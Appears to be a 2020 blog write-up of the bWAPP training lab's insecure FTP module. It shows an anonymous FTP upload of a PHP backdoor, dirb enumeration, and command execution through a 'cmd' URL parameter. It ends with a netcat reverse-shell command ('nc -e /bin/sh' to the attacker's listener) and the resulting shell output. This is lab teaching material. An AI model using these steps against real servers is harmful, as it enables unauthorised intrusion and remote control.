Tuesday, February 4, 2020

bWAPP Insecure FTP Service

In bWAPP There is a Insecure FTP module where you can exploit a misconfiguration in you have the ability to write files to the server as the anonymous user.

We start off by connecting to the remote FTP server with the ftp utility.

sam@ubuntu:~$ ftp 192.168.56.101
Connected to 192.168.56.101.
220 ProFTPD 1.3.1 Server (bee-box) [192.168.56.101]
Name (192.168.56.101:sam): anonymous
331 Anonymous login ok, send your complete email address as your password
Password:
230 Anonymous access granted, restrictions apply
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for file list
-rw-rw-r--   1 root     www-data   543803 Nov  2  2014 Iron_Man.pdf
-rw-rw-r--   1 root     www-data   462949 Nov  2  2014 Terminator_Salvation.pdf
-rw-rw-r--   1 root     www-data   544600 Nov  2  2014 The_Amazing_Spider-Man.pdf
-rw-rw-r--   1 root     www-data   526187 Nov  2  2014 The_Cabin_in_the_Woods.pdf
-rw-rw-r--   1 root     www-data   756522 Nov  2  2014 The_Dark_Knight_Rises.pdf
-rw-rw-r--   1 root     www-data   618117 Nov  2  2014 The_Incredible_Hulk.pdf
-rw-rw-r--   1 root     www-data  5010042 Nov  2  2014 bWAPP_intro.pdf
226 Transfer complete
ftp> pwd
257 "/" is the current directory
ftp> 

Checking for write access

We are going to check for anonymous write access on the ftp server. To accomplish this we will simply 'put' a local file to the remote server.

ftp> put 1.php 1.php
local: 1.php remote: 1.php
200 PORT command successful
150 Opening BINARY mode data connection for 1.php
226 Transfer complete
34 bytes sent in 0.02 secs (1.3439 kB/s)
ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for file list
-rw-r--r--   1 ftp      nogroup        34 Feb  4 08:11 1.php
-rw-rw-r--   1 root     www-data   543803 Nov  2  2014 Iron_Man.pdf
-rw-rw-r--   1 root     www-data   462949 Nov  2  2014 Terminator_Salvation.pdf
-rw-rw-r--   1 root     www-data   544600 Nov  2  2014 The_Amazing_Spider-Man.pdf
-rw-rw-r--   1 root     www-data   526187 Nov  2  2014 The_Cabin_in_the_Woods.pdf
-rw-rw-r--   1 root     www-data   756522 Nov  2  2014 The_Dark_Knight_Rises.pdf
-rw-rw-r--   1 root     www-data   618117 Nov  2  2014 The_Incredible_Hulk.pdf
-rw-rw-r--   1 root     www-data  5010042 Nov  2  2014 bWAPP_intro.pdf
226 Transfer complete
ftp> 

As you can see the transfer was successful but we need to know the directory where we can access our '1.php' file. For this we will use 'dirb' on the remote host

sam@ubuntu:~$ dirb http://192.168.56.101

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Tue Feb  4 01:20:40 2020
URL_BASE: http://192.168.56.101/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.56.101/ ----
+ http://192.168.56.101/.bash_history (CODE:200|SIZE:83)                       
+ http://192.168.56.101/crossdomain (CODE:200|SIZE:200)                        
+ http://192.168.56.101/crossdomain.xml (CODE:200|SIZE:200)                    
==> DIRECTORY: http://192.168.56.101/drupal/                                   
==> DIRECTORY: http://192.168.56.101/evil/                                     
+ http://192.168.56.101/index (CODE:200|SIZE:45)                               
+ http://192.168.56.101/index.html (CODE:200|SIZE:588)                         
==> DIRECTORY: http://192.168.56.101/phpmyadmin/                               
+ http://192.168.56.101/README (CODE:200|SIZE:2491)                            
+ http://192.168.56.101/server-status (CODE:200|SIZE:5925)                     
==> DIRECTORY: http://192.168.56.101/webdav/ 

We find a few links to possible directories where our 1.php file is stored. But if we look at the very bottom we see a webdav dirctory. If we enter in to that directory we find this.

We can issue commands to the server with our 1.php backdoor we uploaded via the anonymous write vulnerability. Lets take a look at what we have with this URL: http://192.168.56.101/webdav/1.php?cmd=id;whoami;uname%20-a

What we want is a shell with can work with better than on the URL all the time. So we will fire up netcat and do a reverse connect back shell and see if we can spawn a shell. http://192.168.56.101/webdav/1.php?cmd=nc -e /bin/sh 192.168.56.1 8088 will be our target url.

sam@ubuntu:~$ nc -nvlp 8088
Listening on [0.0.0.0] (family 0, port 8088)
Connection from 192.168.56.101 50804 received!
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

As you can see we got a successful connect back and system shell

No comments:

Post a Comment

Exploiting Weak WEBDAV Configurations

The server we are going to audit has the following fingerprint. 80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2) Next we need t...